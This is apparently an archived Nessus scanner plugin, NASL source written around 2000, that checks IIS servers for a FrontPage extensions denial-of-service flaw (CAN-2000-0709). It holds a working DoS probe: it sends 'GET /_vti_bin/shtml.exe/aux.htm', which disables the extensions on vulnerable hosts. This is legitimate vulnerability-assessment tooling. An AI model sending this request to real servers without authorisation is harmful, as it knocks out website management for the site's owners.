home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / frontpage_dos.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  3KB  |  108 lines

---

1. #
2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
3. #
4. # See the Nessus Scripts License for details
5. #
6.  
7. if(description)
8. {
9.  script_id(10497);
10.  script_bugtraq_id(1608);
11.  script_version ("$Revision: 1.14 $");
12.  script_cve_id("CAN-2000-0709");
13.  
14.  name["english"] = "Microsoft Frontpage DoS";
15.  name["francais"] = "DΘni de service Microsoft Frontpage"; 
16.  script_name(english:name["english"], francais:name["francais"]);
17.  
18.  desc["english"] = "
19. It is possible to disable the remote frontpage extensions
20. by requesting a URL containing the name of a DOS device
21. through shtml.exe, as :
22.     GET /_vti_bin/shtml.exe/aux.htm
23.     
24. An attacker may use this flaw to prevent anyone to change
25. this website using frontpage.
26.  
27. Solution : Upgrade to FP 1.2
28. Risk factor : High";
29.  
30.  desc["francais"] = "
31. Il est possible de dΘsactiver les extensions frontpage
32. du site distant en faisant la requΦte d'une URL contenant
33. le nom d'un pΘriphΘrique DOS, en passant par shtml.exe, comme
34. dans :
35.     GET /_vti_bin/shtml.exe/aux.htm
36.     
37. Un pirate peut utiliser ce problΦme pour empecher qui que ce
38. soit de changer de site web par l'intermediaire de FrontPage
39.  
40. Solution : Mettez FrontPage α jour en version 1.2
41. Facteur de risque : SΘrieux";
42.  
43.  
44.  script_description(english:desc["english"], francais:desc["francais"]);
45.  
46.  summary["english"] = "Disables Microsoft Frontpage extensions";
47.  summary["francais"] = "DΘsactive les extensions Frontpage";
48.  script_summary(english:summary["english"], francais:summary["francais"]);
49.  
50.  script_category(ACT_DENIAL);
51.  
52.  
53.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
54.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
55.  family["english"] = "Denial of Service";
56.  family["francais"] = "DΘni de service";
57.  script_family(english:family["english"], francais:family["francais"]);
58.  script_dependencie("find_service.nes", "http_version.nasl", "www_fingerprinting_hmap.nasl");
59.  script_require_ports("Services/www", 80);
60.  exit(0);
61. }
62.  
63. #
64. # The script code starts here
65. #
66.  
67. include("http_func.inc");
68.  
69. port = get_http_port(default:80);
70.  
71. sig = get_kb_item("www/hmap/" + port + "/description");
72. if ( sig && "IIS" >!< sig ) exit(0);
73.  
74. if(get_port_state(port))
75. {
76.  soc = http_open_socket(port);
77.   if(soc)
78.   {
79.  
80.     name = get_host_name();
81.     req1 = http_get(item:"/_vti_bin/shtml.exe",
82.                  port:port);
83.             
84.     req2 = http_get(item:"/_vti_bin/shtml.exe/aux.htm",
85.                  port:port);
86.   
87.     send(socket:soc, data:req1);
88.     r1 = recv_line(socket:soc, length:1024);
89.     http_close_socket(soc);
90.     if(ereg(pattern:"HTTP/[0-9]\.[0-9] 200 .*", 
91.             string:r1))
92.     {        
93.     soc = http_open_socket(port);
94.     send(socket:soc, data:req2);
95.     r2 = recv_line(socket:soc, length:1024);
96.     http_close_socket(soc);
97.  
98.     soc = http_open_socket(port);
99.     send(socket:soc, data:req1);
100.     r3 = recv_line(socket:soc, length:1024);
101.     http_close_socket(soc);
102.     
103.     if(!r3)security_hole(port);
104.     }
105.   }
106. }
107.     
108.